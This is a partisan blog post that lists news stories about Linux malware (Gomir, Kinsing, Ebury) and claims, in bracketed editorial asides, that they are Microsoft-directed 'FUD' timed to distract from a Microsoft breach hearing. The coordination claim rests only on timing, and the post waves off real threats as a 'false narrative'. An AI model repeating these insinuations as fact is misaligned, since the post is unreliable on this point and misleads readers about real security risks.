Microsoft-Connected Sites Trying to Shift Attention Away From Microsoft's Megabreach Only Days Before Important If Not Unprecedented Grilling by the US Government?

posted by Roy Schestowitz on May 17, 2024,
updated May 22, 2024

The real news to focus on:

Context (days ago):

• Ebury is Not "Linux", That's Just the Media Shifting Attention (Microsoft in the Hot Seat for Total Breach Right Now)
• FUD Alert: 2024 is Not 2011 and Ebury is Not "Linux"

The latest "twist":

• Kimsuky hackers deploy new Linux backdoor in attacks on South Korea [Ed: New way to shift attention away from Smith's grilling for Microsoft getting cracked? See this. This is from a Microsoft-connected site.]

  The North Korean hacker group Kimsuki has been using a new Linux malware called Gomir that is a version of the GoBear backdoor delivered via trojanized software installers.

  Kimsuky is a state-sponsored threat actor linked to North Korea’s military intelligence, the Reconnaissance General Bureau (RGB).

• Breach Roundup: Kimsuky Serves Linux Trojan [Ed: Interesting timing because of Microsoft being under the microscope for mega-breach. It says "hackers used a Linus [sic] backdoor", so they clearly don't know what they write about, they just blindly relay FUD for sponsors.]

• Kimsuky APT Using Newly Discovered Gomir Linux Backdoor [Ed: Microsofters looking for excuses to say "Linux backdoor" a few days before Microsoft cover-up and complete, total breach becoming an anticipated federal grilling?]

Is the timing merely a coincidence yet again? We previously showed people on Microsoft's payroll and even Microsoft staff inside the Linux Foundation taking the lead in these campaigns of fearmongering (since end of March).

Why does the mainstream media not entertain the possibility a lot of these talking points are directed out of Redmond?

Update

This FUD only intensified a day later, e.g.

• Kimsuky APT Deploying Linux Backdoor Gomir in South Korean Cyber Attacks

  The Kimsuky (aka Springtail) advanced persistent threat (APT) group, which is linked to North Korea's Reconnaissance General Bureau (RGB), has been observed deploying a Linux version of its GoBear backdoor as part of a campaign targeting South Korean organizations.

  The backdoor, codenamed Gomir, is "structurally almost identical to GoBear, with extensive sharing of code between malware variants," the Symantec Threat Hunter Team, part of Broadcom, said in a new report. "Any functionality from GoBear that is operating system-dependent is either missing or reimplemented in Gomir."

• North Korean hackers have some deious new Linux backdoor attacks to target victims

  Among the similarities between Gomir and GoBear are direct C2 communication, persistence methods, and different capabilities, such as pausing communications with C2, running arbitrary shell commands, changing the working directory, probing network endpoints, reporting system configuration details, starting a reverse proxy for remote connections, creating arbitrary files on the system, exfiltrating files from the system, and more.

• North Korea-Linked Kimsuky Hackers Use Gomir Backdoor on Linux | Tech Times

  The North Korean cyber-espionage group Kimsuki, linked to the military intelligence agency Reconnaissance General Bureau (RGB), has unveiled a new Linux malware known as Gomir.

• Kinsing malware exploits Apache Tomcat on Linux clouds

  Tenable's Cloud Security Research team has unearthed a series of attacks by the Kinsing malware family, particularly targeting Linux-based cloud infrastructures. In a new development, these malicious programmes are now exploiting Apache Tomcat servers, adopting new advanced stealth techniques for file system penetration and persistence.

  Kinsing, a malware family operational for numerous years, primarily attacks Linux-based cloud infrastructure. Known for exploiting a range of vulnerabilities to gain unauthorised access, the hostile actors behind the Kinsing malware frequently install backdoors and illicitly deploy cryptocurrency miners on compromised systems. Once the infection has taken hold, Kinsing co-opts system resources, employing these for cryptomining. This redirection of system resources inhibits server performance and increases operational costs.

Also the older wave:

• 400K Linux Servers Recruited by Resurrected Ebury Botnet

  A Linux-based botnet is alive and well, powering cryptocurrency theft and financial scams years after the imprisonment of one the key perpetrators behind it.

  The Ebury botnet – which was first discovered 15 years ago – has backdoored nearly 400,000 Linux, FreeBSD, and OpenBSD servers. More than 100,000 servers were still compromised as of late 2023, according to new research from cybersecurity vendor ESET.

  Victims include universities, small and large enterprises, Internet service providers, cryptocurrency traders, Tor exit nodes, and many hosting providers worldwide.

• ESET Research: Ebury botnet alive & growing; 400k Linux servers compromised for cryptocurrency theft and financial gain

  ESET Research released today its deep-dive investigation into one of the most advanced server-side malware campaigns, which is still growing and has seen hundreds of thousands of compromised servers in its at least 15-year-long operation. Among the activities of the infamous Ebury group and botnet over the years has been the spread of spam, web traffic redirections, and credential stealing. In recent years it has diversified to credit card and cryptocurrency theft. Additionally, Ebury has been deployed as a backdoor to compromise almost 400,000 Linux, FreeBSD, and OpenBSD servers; more than 100,000 were still compromised as of late 2023. In many cases, Ebury operators were able to gain full access to large servers of ISPs and well-known hosting providers.

Sam Varghese joins in:

• Tenable finds old GNU/Linux malware now targeting Tomcat servers

  Security firm Tenable says its Cloud Security Research Team recently discovered that the Kinsing malware, which is known to target Linux-based cloud infrastructure, is exploiting Apache Tomcat servers using what it claims are "new advanced stealth techniques".

2 more FUD pieces today?

• New Linux Backdoor Attacking Linux Users Via Installation Packages [Ed: Distraction with "Linux backdoor" just in time for Microsoft grilling over getting cracked completely, then covering up?]

  Linux is widely used in numerous servers, cloud infrastructure, and Internet of Things devices, which makes it an attractive target for gaining unauthorized access or spreading malware.

• North Korea-linked Kimsuky used a new Linux backdoor in recent attacks [Ed: They keep pushing this false narrative of "back doors" to FUD Linux while Microsoft should be blasted]

Another update: we're still seeing it this week, e.g.

• Novel Linux backdoor used in Kimsuky attacks

  Security Affairs reports that North Korean state-sponsored cyberespionage operation Kimsuky, also known as APT43, Springtail, Black Banshee, Velvet Chollima, Thallium, and ARCHIPELAGO, has been targeting South Korean entities with the new Gomir Linux backdoor.